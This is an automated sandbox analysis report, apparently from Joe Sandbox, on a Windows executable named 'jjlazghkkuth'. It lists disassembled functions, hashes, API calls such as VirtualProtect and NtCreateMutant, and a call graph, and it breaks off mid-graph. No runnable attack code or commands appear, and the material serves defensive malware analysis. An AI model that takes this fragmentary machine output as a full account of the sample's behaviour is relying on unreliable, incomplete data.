                                                        • Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
                                                        • Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                        • String ID: 0$X$`
                                                        • API String ID: 329590056-2527496196
                                                        • Opcode ID: 7b2a33b9fae322ee24d76996efd72da4f7d36b3ec6a72cb06d8734951d1eeac8
                                                        • Instruction ID: 8c90afaa81d04bea51fe0cb295af62d96c6470b985ee916a09ac9b14805c96d8
                                                        • Opcode Fuzzy Hash: 7b2a33b9fae322ee24d76996efd72da4f7d36b3ec6a72cb06d8734951d1eeac8
                                                        • Instruction Fuzzy Hash: 97026C22918BC585F720AF15E8443AAB7B0FB857A4F884235DA9C47BE5EF3CD185CB11
                                                        Function 00007FF759BF1BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,00007FF759BFA4B4,00007FF759BFA4B4,?,?,00007FF759BF0000,?,00007FF759BF1991), ref: 00007FF759BF1C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,00007FF759BFA4B4,00007FF759BFA4B4,?,?,00007FF759BF0000,?,00007FF759BF1991), ref: 00007FF759BF1CC7
                                                        • memcpy.MSVCRT ref: 00007FF759BF1CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,00007FF759BFA4B4,00007FF759BFA4B4,?,?,00007FF759BF0000,?,00007FF759BF1991), ref: 00007FF759BF1D23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
                                                        • Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: 0deee9cd0ba2319482cc86d0a3ef914e3088b52e5e70b18c8ce3c0687bb0a018
                                                        • Instruction ID: ce74b520d3dcc67d2d750f7b0e8fbf6e1670659225c1be389879850509304638
                                                        • Opcode Fuzzy Hash: 0deee9cd0ba2319482cc86d0a3ef914e3088b52e5e70b18c8ce3c0687bb0a018
                                                        • Instruction Fuzzy Hash: 07418FA1A0964B81FA54AF45D9846B8A7B0FB44BC0F9D4932CE0D47795EF3CE547CB20
                                                        Function 00007FF759BF2104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
                                                        • Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                        • String ID:
                                                        • API String ID: 3326252324-0
                                                        • Opcode ID: 6202ad9642b61ede5142cafd6873fb990c29b47e697254827fe3e53e840c4266
                                                        • Instruction ID: 67fb6dc28b720eae9cb0b00335a2b7fe110fb163831c1dfcff415431b0bbcc6b
                                                        • Opcode Fuzzy Hash: 6202ad9642b61ede5142cafd6873fb990c29b47e697254827fe3e53e840c4266
                                                        • Instruction Fuzzy Hash: FF21A922E1995A81FE69BF51E994275A270BF55B90FCC4031C90E47BA4EF2CF947C321
                                                        Function 00007FF759BF1E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 640 7ff759bf1e10-7ff759bf1e2d 641 7ff759bf1e2f-7ff759bf1e38 640->641 642 7ff759bf1e3e-7ff759bf1e48 640->642 641->642 643 7ff759bf1f60-7ff759bf1f69 641->643 644 7ff759bf1ea3-7ff759bf1ea8 642->644 645 7ff759bf1e4a-7ff759bf1e53 642->645 644->643 646 7ff759bf1eae-7ff759bf1eb3 644->646 647 7ff759bf1e55-7ff759bf1e60 645->647 648 7ff759bf1ecc-7ff759bf1ed1 645->648 649 7ff759bf1eb5-7ff759bf1eba 646->649 650 7ff759bf1efb-7ff759bf1f0a call 7ff759bf8990 646->650 647->644 651 7ff759bf1f23-7ff759bf1f2d 648->651 652 7ff759bf1ed3-7ff759bf1ee2 signal 648->652 649->643 653 7ff759bf1ec0 649->653 650->651 662 7ff759bf1f0c-7ff759bf1f10 650->662 656 7ff759bf1f43-7ff759bf1f45 651->656 657 7ff759bf1f2f-7ff759bf1f3f 651->657 652->651 654 7ff759bf1ee4-7ff759bf1ee8 652->654 653->651 658 7ff759bf1f4e-7ff759bf1f53 654->658 659 7ff759bf1eea-7ff759bf1ef9 signal 654->659 656->643 657->656 661 7ff759bf1f5a 658->661 659->643 661->643 663 7ff759bf1f55 662->663 664 7ff759bf1f12-7ff759bf1f21 signal 662->664 663->661 664->643
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
                                                        • Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CCG
                                                        • API String ID: 0-1584390748
                                                        • Opcode ID: 427cd3d36267b3fa69e89bab234189796d32b27608e303035859b8d0eeaeffb8
                                                        • Instruction ID: 5e1da40a040844f0ce2789aa592b79012d0295bb7d687ff60ccee3cd48902f25
                                                        • Opcode Fuzzy Hash: 427cd3d36267b3fa69e89bab234189796d32b27608e303035859b8d0eeaeffb8
                                                        • Instruction Fuzzy Hash: 1F218E22E0914E42FA757E14968037992B19F84764FAD8971DA1E433D4FF2DF8C38AA1
                                                        Function 00007FF759BF1880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 665 7ff759bf1880-7ff759bf189c 666 7ff759bf18a2-7ff759bf18f9 call 7ff759bf2420 call 7ff759bf2660 665->666 667 7ff759bf1a0f-7ff759bf1a1f 665->667 666->667 672 7ff759bf18ff-7ff759bf1910 666->672 673 7ff759bf1912-7ff759bf191c 672->673 674 7ff759bf193e-7ff759bf1941 672->674 675 7ff759bf194d-7ff759bf1954 673->675 676 7ff759bf191e-7ff759bf1929 673->676 674->675 677 7ff759bf1943-7ff759bf1947 674->677 680 7ff759bf1956-7ff759bf1961 675->680 681 7ff759bf199e-7ff759bf19a6 675->681 676->675 678 7ff759bf192b-7ff759bf193a 676->678 677->675 679 7ff759bf1a20-7ff759bf1a26 677->679 678->674 682 7ff759bf1a2c-7ff759bf1a37 679->682 683 7ff759bf1b87-7ff759bf1b98 call 7ff759bf1d40 679->683 684 7ff759bf1970-7ff759bf199c call 7ff759bf1ba0 680->684 681->667 685 7ff759bf19a8-7ff759bf19c1 681->685 682->681 686 7ff759bf1a3d-7ff759bf1a5f 682->686 684->681 688 7ff759bf19df-7ff759bf19e7 685->688 690 7ff759bf1a7d-7ff759bf1a97 686->690 692 7ff759bf19d0-7ff759bf19dd 688->692 693 7ff759bf19e9-7ff759bf1a0d VirtualProtect 688->693 695 7ff759bf1b74-7ff759bf1b82 call 7ff759bf1d40 690->695 696 7ff759bf1a9d-7ff759bf1afa 690->696 692->667 692->688 693->692 697 7ff759bf1a70-7ff759bf1a77 693->697 695->683 702 7ff759bf1b22-7ff759bf1b26 696->702 703 7ff759bf1afc-7ff759bf1b0e 696->703 697->681 697->690 702->697 706 7ff759bf1b2c-7ff759bf1b30 702->706 704 7ff759bf1b10-7ff759bf1b20 703->704 705 7ff759bf1b5c-7ff759bf1b6f call 7ff759bf1d40 703->705 704->702 704->705 705->695 706->697 708 7ff759bf1b36-7ff759bf1b57 call 7ff759bf1ba0 706->708 708->705
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF759BF1247), ref: 00007FF759BF19F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
                                                        • Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: 980c9c0f67357cad808cfc73b9f707eed9ad7f9cf4014a5acad94c34b8aa7a4b
                                                        • Instruction ID: 217e40336425254dfbde39a568059f28e7931dc6d617242ed43c8e50271efd3b
                                                        • Opcode Fuzzy Hash: 980c9c0f67357cad808cfc73b9f707eed9ad7f9cf4014a5acad94c34b8aa7a4b
                                                        • Instruction Fuzzy Hash: 5D515D22E0854AD6FB54AF25D9447B4A771EB14B94F8C8531D92C077A4EF3CE487CB20
                                                        Function 00007FF759BF1800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 712 7ff759bf1800-7ff759bf1810 713 7ff759bf1824 712->713 714 7ff759bf1812-7ff759bf1822 712->714 715 7ff759bf182b-7ff759bf1867 call 7ff759bf2290 fprintf 713->715 714->715
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
                                                        • Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: 63103e160961b71847a4263c697666ec41891c327a8e8c0011d2add9cd08cfe4
                                                        • Instruction ID: 37b330f5db8612dfb0575305ea8240e10bf2b4fae6ed9a1a3c0a532c1e414303
                                                        • Opcode Fuzzy Hash: 63103e160961b71847a4263c697666ec41891c327a8e8c0011d2add9cd08cfe4
                                                        • Instruction Fuzzy Hash: 71F0C212E08A8982F620BF24AA410B9E371EB597C0F849231DE4E53651FF2CF283C310
                                                        Function 00007FF759BF219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
                                                        • Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 682475483-0
                                                        • Opcode ID: 3592c698fd96db414e18d9b1a955536c8f084f27075795ee67145d81e77bf88e
                                                        • Instruction ID: acafd71518a3c1e8a0ba5fd0faa31606621c5fe6154fbfcb3b66b88fd68fcc56
                                                        • Opcode Fuzzy Hash: 3592c698fd96db414e18d9b1a955536c8f084f27075795ee67145d81e77bf88e
                                                        • Instruction Fuzzy Hash: C1018826A09A5681FE5AAF51E944274A270AF54B91FCC4031CA0D53B94FF3CF997C325

                                                        Execution Graph

                                                        Execution Coverage:2.4%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:853
                                                        Total number of Limit Nodes:2
                                                        execution_graph 2840 140001ac3 2841 140001a70 2840->2841 2842 140001b36 2841->2842 2843 14000199e 2841->2843 2847 140001b53 2841->2847 2844 140001ba0 4 API calls 2842->2844 2845 140001a0f 2843->2845 2846 1400019e9 VirtualProtect 2843->2846 2844->2847 2846->2843 1990 140001ae4 1992 140001a70 1990->1992 1991 140001b36 1998 140001ba0 1991->1998 1992->1991 1993 14000199e 1992->1993 1996 140001b53 1992->1996 1995 140001a0f 1993->1995 1997 1400019e9 VirtualProtect 1993->1997 1997->1993 1999 140001bc2 1998->1999 2001 140001cf4 1999->2001 2002 140001c45 VirtualQuery 1999->2002 2006 140001c04 memcpy 1999->2006 2003 140001d23 GetLastError 2001->2003 2002->2001 2007 140001c72 2002->2007 2005 140001d37 2003->2005 2004 140001ca4 VirtualProtect 2004->2003 2004->2006 2006->1996 2007->2004 2007->2006 2035 140001404 2108 140001394 2035->2108 2037 140001413 2038 140001394 2 API calls 2037->2038 2039 140001422 2038->2039 2040 140001394 2 API calls 2039->2040 2041 140001431 2040->2041 2042 140001394 2 API calls 2041->2042 2043 140001440 2042->2043 2044 140001394 2 API calls 2043->2044 2045 14000144f 2044->2045 2046 140001394 2 API calls 2045->2046 2047 14000145e 2046->2047 2048 140001394 2 API calls 2047->2048 2049 14000146d 2048->2049 2050 140001394 2 API calls 2049->2050 2051 14000147c 2050->2051 2052 140001394 2 API calls 2051->2052 2053 14000148b 2052->2053 2054 140001394 2 API calls 2053->2054 2055 14000149a 2054->2055 2056 140001394 2 API calls 2055->2056 2057 1400014a9 2056->2057 2058 140001394 2 API calls 2057->2058 2059 1400014b8 2058->2059 2060 140001394 2 API calls 2059->2060 2061 1400014c7 2060->2061 2062 140001394 2 API calls 2061->2062 2063 1400014d6 2062->2063 2064 1400014e5 2063->2064 2065 140001394 2 API calls 2063->2065 2066 140001394 2 API calls 2064->2066 2065->2064 2067 1400014ef 2066->2067 2068 1400014f4 2067->2068 2069 140001394 2 API calls 2067->2069 2070 140001394 2 API calls 2068->2070 2069->2068 2071 1400014fe 2070->2071 2072 140001503 2071->2072 2073 140001394 2 API calls 2071->2073 2074 140001394 2 API calls 2072->2074 2073->2072 2075 14000150d 2074->2075 2076 140001394 2 API calls 2075->2076 2077 140001512 2076->2077 2078 140001394 2 API calls 2077->2078 2079 140001521 2078->2079 2080 140001394 2 API calls 2079->2080 2081 140001530 2080->2081 2082 140001394 2 API calls 2081->2082 2083 14000153f 2082->2083 2084 140001394 2 API calls 2083->2084 2085 14000154e 2084->2085 2086 140001394 2 API calls 2085->2086 2087 14000155d 2086->2087 2088 140001394 2 API calls 2087->2088 2089 14000156c 2088->2089 2090 140001394 2 API calls 2089->2090 2091 14000157b 2090->2091 2092 140001394 2 API calls 2091->2092 2093 14000158a 2092->2093 2094 140001394 2 API calls 2093->2094 2095 140001599 2094->2095 2096 140001394 2 API calls 2095->2096 2097 1400015a8 2096->2097 2098 140001394 2 API calls 2097->2098 2099 1400015b7 2098->2099 2100 140001394 2 API calls 2099->2100 2101 1400015c6 2100->2101 2102 140001394 2 API calls 2101->2102 2103 1400015d5 2102->2103 2104 140001394 2 API calls 2103->2104 2105 1400015e4 2104->2105 2106 140001394 2 API calls 2105->2106 2107 1400015f3 2106->2107 2109 140005a10 malloc 2108->2109 2110 1400013b8 2109->2110 2111 1400013c6 NtCreateMutant 2110->2111 2111->2037 2112 140002104 2113 140002111 EnterCriticalSection 2112->2113 2118 140002218 2112->2118 2114 14000220b LeaveCriticalSection 2113->2114 2120 14000212e 2113->2120 2114->2118 2115 140002272 2116 14000214d TlsGetValue GetLastError 2116->2120 2117 140002241 DeleteCriticalSection 2117->2115 2118->2115 2118->2117 2119 140002230 free 2118->2119 2119->2117 2119->2119 2120->2114 2120->2116 2008 140001e65 2009 140001e67 signal 2008->2009 2010 140001e7c 2009->2010 2012 140001e99 2009->2012 2011 140001e82 signal 2010->2011 2010->2012 2011->2012 2848 140001f47 2849 140001e67 signal 2848->2849 2851 140001e99 2848->2851 2850 140001e7c 2849->2850 2849->2851 2850->2851 2852 140001e82 signal 2850->2852 2852->2851 2013 14000216f 2014 140002185 2013->2014 2015 140002178 InitializeCriticalSection 2013->2015 2015->2014 2016 140001a70 2017 14000199e 2016->2017 2021 140001a7d 2016->2021 2018 140001a0f 2017->2018 2019 1400019e9 VirtualProtect 2017->2019 2019->2017 2020 140001b53 2021->2016 2021->2020 2022 140001b36 2021->2022 2023 140001ba0 4 API calls 2022->2023 2023->2020 2121 140001e10 2122 140001e2f 2121->2122 2123 140001e55 2122->2123 2124 140001ecc 2122->2124 2126 140001eb5 2122->2126 2123->2126 2129 140001f12 signal 2123->2129 2125 140001ed3 signal 2124->2125 2124->2126 2125->2126 2127 140001ee4 2125->2127 2127->2126 2128 140001eea signal 2127->2128 2128->2126 2129->2126 2853 140002050 2854 14000205e EnterCriticalSection 2853->2854 2855 1400020cf 2853->2855 2856 1400020c2 LeaveCriticalSection 2854->2856 2857 140002079 2854->2857 2856->2855 2857->2856 2858 1400020bd free 2857->2858 2858->2856 2859 140001fd0 2860 140001fe4 2859->2860 2861 140002033 2859->2861 2860->2861 2862 140001ffd EnterCriticalSection LeaveCriticalSection 2860->2862 2862->2861 2138 140001ab3 2139 140001a70 2138->2139 2139->2138 2140 140001b53 2139->2140 2141 140001b36 2139->2141 2144 14000199e 2139->2144 2142 140001ba0 4 API calls 2141->2142 2142->2140 2143 140001a0f 2144->2143 2145 1400019e9 VirtualProtect 2144->2145 2145->2144 1980 140001394 1984 140005a10 1980->1984 1982 1400013b8 1983 1400013c6 NtCreateMutant 1982->1983 1985 140005a2e 1984->1985 1988 140005a5b 1984->1988 1985->1982 1986 140005b03 1987 140005b1f malloc 1986->1987 1989 140005b40 1987->1989 1988->1985 1988->1986 1989->1985 2130 14000219e 2131 140002272 2130->2131 2132 1400021ab EnterCriticalSection 2130->2132 2133 140002265 LeaveCriticalSection 2132->2133 2135 1400021c8 2132->2135 2133->2131 2134 1400021e9 TlsGetValue GetLastError 2134->2135 2135->2133 2135->2134 2024 140001800 2025 140001812 2024->2025 2026 140001835 fprintf 2025->2026 2027 140001000 2028 14000108b __set_app_type 2027->2028 2029 140001040 2027->2029 2031 1400010b6 2028->2031 2029->2028 2030 1400010e5 2031->2030 2033 140001e00 2031->2033 2034 140005fa0 __setusermatherr 2033->2034 2136 140002320 strlen 2137 140002337 2136->2137 2146 140001140 2149 140001160 2146->2149 2148 140001156 2150 1400011b9 2149->2150 2151 14000118b 2149->2151 2152 1400011d3 2150->2152 2153 1400011c7 _amsg_exit 2150->2153 2151->2150 2154 1400011a0 Sleep 2151->2154 2155 140001201 _initterm 2152->2155 2156 14000121a 2152->2156 2153->2152 2154->2150 2154->2151 2155->2156 2172 140001880 2156->2172 2159 14000126a 2160 14000126f malloc 2159->2160 2161 14000128b 2160->2161 2163 1400012d0 2160->2163 2162 1400012a0 strlen malloc memcpy 2161->2162 2162->2162 2162->2163 2183 140003150 2163->2183 2165 140001315 2166 140001344 2165->2166 2167 140001324 2165->2167 2170 140001160 53 API calls 2166->2170 2168 140001338 2167->2168 2169 14000132d _cexit 2167->2169 2168->2148 2169->2168 2171 140001366 2170->2171 2171->2148 2173 140001247 SetUnhandledExceptionFilter 2172->2173 2174 1400018a2 2172->2174 2173->2159 2174->2173 2175 14000194d 2174->2175 2180 140001a20 2174->2180 2176 14000199e 2175->2176 2177 140001ba0 4 API calls 2175->2177 2176->2173 2179 1400019e9 VirtualProtect 2176->2179 2177->2175 2178 140001b53 2179->2176 2180->2176 2180->2178 2181 140001b36 2180->2181 2182 140001ba0 4 API calls 2181->2182 2182->2178 2186 140003166 2183->2186 2184 14000324d wcslen 2260 14000153f 2184->2260 2186->2184 2188 14000344e 2188->2165 2194 140003348 2195 1400033f0 wcslen 2194->2195 2196 140003406 2195->2196 2200 14000344c 2195->2200 2197 140003420 _wcsnicmp 2196->2197 2198 140003436 wcslen 2197->2198 2197->2200 2198->2197 2198->2200 2199 140003511 wcscpy wcscat 2202 140003543 2199->2202 2200->2199 2201 140003593 wcscpy wcscat 2204 1400035c9 2201->2204 2202->2201 2203 1400036de wcscpy wcscat 2205 140003717 2203->2205 2204->2203 2206 140003a68 wcslen 2205->2206 2207 140003a76 2206->2207 2211 140003aab 2206->2211 2208 140003a80 _wcsnicmp 2207->2208 2209 140003a96 wcslen 2208->2209 2208->2211 2209->2208 2209->2211 2210 140003bba wcscpy wcscat 2213 140003bef 2210->2213 2211->2210 2212 140003c3f wcscpy wcscat 2215 140003c78 2212->2215 2213->2212 2214 140003cb5 wcscpy wcscat 2217 140003cfc 2214->2217 2215->2214 2216 140003d4e wcscpy wcscat wcslen 2400 14000146d 2216->2400 2217->2216 2222 140003e65 2486 1400014a9 2222->2486 2223 140003fa8 2225 14000145e 2 API calls 2223->2225 2231 140003efc 2225->2231 2227 140003f97 2232 14000145e 2 API calls 2227->2232 2228 1400056a7 2230 14000403a wcscpy wcscat wcslen 2250 140004110 2230->2250 2231->2228 2231->2230 2232->2231 2234 140003ef0 2236 14000145e 2 API calls 2234->2236 2236->2231 2237 140004205 wcslen 2238 14000153f 2 API calls 2237->2238 2238->2250 2239 1400052ca memcpy 2239->2250 2240 1400043fb wcslen 2647 14000157b 2240->2647 2241 14000466d wcslen 2243 14000153f 2 API calls 2241->2243 2243->2250 2244 140004f61 wcscpy wcscat wcslen 2245 140001422 2 API calls 2244->2245 2245->2250 2247 1400044f3 wcslen 2664 1400015a8 2247->2664 2250->2237 2250->2239 2250->2240 2250->2241 2250->2244 2250->2247 2251 14000455f _wcsnicmp 2250->2251 2252 14000145e NtCreateMutant malloc 2250->2252 2253 1400050a3 2250->2253 2254 14000542c memcpy 2250->2254 2255 14000514e wcslen 2250->2255 2256 1400026e0 9 API calls 2250->2256 2258 140004db5 wcscpy wcscat wcslen 2250->2258 2602 1400014d6 2250->2602 2675 140001521 2250->2675 2773 140001431 2250->2773 2251->2250 2252->2250 2253->2165 2254->2250 2257 1400015a8 2 API calls 2255->2257 2256->2250 2257->2250 2704 140001422 2258->2704 2261 140001394 2 API calls 2260->2261 2262 14000154e 2261->2262 2263 140001394 2 API calls 2262->2263 2264 14000155d 2263->2264 2265 140001394 2 API calls 2264->2265 2266 14000156c 2265->2266 2267 140001394 2 API calls 2266->2267 2268 14000157b 2267->2268 2269 140001394 2 API calls 2268->2269 2270 14000158a 2269->2270 2271 140001394 2 API calls 2270->2271 2272 140001599 2271->2272 2273 140001394 2 API calls 2272->2273 2274 1400015a8 2273->2274 2275 140001394 2 API calls 2274->2275 2276 1400015b7 2275->2276 2277 140001394 2 API calls 2276->2277 2278 1400015c6 2277->2278 2279 140001394 2 API calls 2278->2279 2280 1400015d5 2279->2280 2281 140001394 2 API calls 2280->2281 2282 1400015e4 2281->2282 2283 140001394 2 API calls 2282->2283 2284 1400015f3 2283->2284 2284->2188 2285 140001503 2284->2285 2286 140001394 2 API calls 2285->2286 2287 14000150d 2286->2287 2288 140001394 2 API calls 2287->2288 2289 140001512 2288->2289 2290 140001394 2 API calls 2289->2290 2291 140001521 2290->2291 2292 140001394 2 API calls 2291->2292 2293 140001530 2292->2293 2294 140001394 2 API calls 2293->2294 2295 14000153f 2294->2295 2296 140001394 2 API calls 2295->2296 2297 14000154e 2296->2297 2298 140001394 2 API calls 2297->2298 2299 14000155d 2298->2299 2300 140001394 2 API calls 2299->2300 2301 14000156c 2300->2301 2302 140001394 2 API calls 2301->2302 2303 14000157b 2302->2303 2304 140001394 2 API calls 2303->2304 2305 14000158a 2304->2305 2306 140001394 2 API calls 2305->2306 2307 140001599 2306->2307 2308 140001394 2 API calls 2307->2308 2309 1400015a8 2308->2309 2310 140001394 2 API calls 2309->2310 2311 1400015b7 2310->2311 2312 140001394 2 API calls 2311->2312 2313 1400015c6 2312->2313 2314 140001394 2 API calls 2313->2314 2315 1400015d5 2314->2315 2316 140001394 2 API calls 2315->2316 2317 1400015e4 2316->2317 2318 140001394 2 API calls 2317->2318 2319 1400015f3 2318->2319 2319->2194 2320 14000156c 2319->2320 2321 140001394 2 API calls 2320->2321 2322 14000157b 2321->2322 2323 140001394 2 API calls 2322->2323 2324 14000158a 2323->2324 2325 140001394 2 API calls 2324->2325 2326 140001599 2325->2326 2327 140001394 2 API calls 2326->2327 2328 1400015a8 2327->2328 2329 140001394 2 API calls 2328->2329 2330 1400015b7 2329->2330 2331 140001394 2 API calls 2330->2331 2332 1400015c6 2331->2332 2333 140001394 2 API calls 2332->2333 2334 1400015d5 2333->2334 2335 140001394 2 API calls 2334->2335 2336 1400015e4 2335->2336 2337 140001394 2 API calls 2336->2337 2338 1400015f3 2337->2338 2338->2194 2339 14000145e 2338->2339 2340 140001394 2 API calls 2339->2340 2341 14000146d 2340->2341 2342 140001394 2 API calls 2341->2342 2343 14000147c 2342->2343 2344 140001394 2 API calls 2343->2344 2345 14000148b 2344->2345 2346 140001394 2 API calls 2345->2346 2347 14000149a 2346->2347 2348 140001394 2 API calls 2347->2348 2349 1400014a9 2348->2349 2350 140001394 2 API calls 2349->2350 2351 1400014b8 2350->2351 2352 140001394 2 API calls 2351->2352 2353 1400014c7 2352->2353 2354 140001394 2 API calls 2353->2354 2355 1400014d6 2354->2355 2356 1400014e5 2355->2356 2357 140001394 2 API calls 2355->2357 2358 140001394 2 API calls 2356->2358 2357->2356 2359 1400014ef 2358->2359 2360 1400014f4 2359->2360 2361 140001394 2 API calls 2359->2361 2362 140001394 2 API calls 2360->2362 2361->2360 2363 1400014fe 2362->2363 2364 140001503 2363->2364 2365 140001394 2 API calls 2363->2365 2366 140001394 2 API calls 2364->2366 2365->2364 2367 14000150d 2366->2367 2368 140001394 2 API calls 2367->2368 2369 140001512 2368->2369 2370 140001394 2 API calls 2369->2370 2371 140001521 2370->2371 2372 140001394 2 API calls 2371->2372 2373 140001530 2372->2373 2374 140001394 2 API calls 2373->2374 2375 14000153f 2374->2375 2376 140001394 2 API calls 2375->2376 2377 14000154e 2376->2377 2378 140001394 2 API calls 2377->2378 2379 14000155d 2378->2379 2380 140001394 2 API calls 2379->2380 2381 14000156c 2380->2381 2382 140001394 2 API calls 2381->2382 2383 14000157b 2382->2383 2384 140001394 2 API calls 2383->2384 2385 14000158a 2384->2385 2386 140001394 2 API calls 